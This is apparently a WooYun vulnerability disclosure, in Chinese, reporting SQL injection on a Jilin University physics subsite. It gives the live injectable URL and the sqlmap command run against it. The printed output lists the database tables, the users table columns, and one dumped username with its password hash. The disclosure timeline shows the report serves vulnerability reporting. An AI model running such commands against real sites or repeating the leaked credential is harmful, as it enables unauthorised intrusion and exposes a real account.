漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-05-27: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-06-06: 细节向核心白帽子及相关领域专家公开
2014-06-16: 细节向普通白帽子公开
2014-06-26: 细节向实习白帽子公开
2014-07-11: 细节向公众公开
简要描述:
吉林大学某分站存在SQL注入
详细说明:
注入点:http://phy60.jlu.edu.cn/categories.php?id=3
D:\Python27\sqlmap>sqlmap.py -u "http://phy60.jlu.edu.cn/categories.php?id=3" --
dbms "mysql" --tables -D "physics"
Database: physics
[9 tables]
+------------+
| articles |
| categories |
| cms_users |
| config |
| guestbook |
| invite |
| links |
| students |
| users |
+------------+
Table: users
[9 columns]
+-----------+---------+
| Column | Type |
+-----------+---------+
| author | numeric |
| content | numeric |
| extension | numeric |
| id | numeric |
| ip | numeric |
| password | numeric |
| realname | numeric |
| title | numeric |
| username | numeric |
+-----------+---------+
Database: physics
Table: users
[1 entry]
+---------------+----------+
| password | username |
+---------------+----------+
| ho9d.fPygIzco | holly |
+---------------+----------+
漏洞证明:
修复方案:
过滤
版权声明:转载请注明来源 p4ssw0rd@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-05-27 11:09
厂商回复:
..
最新状态:
暂无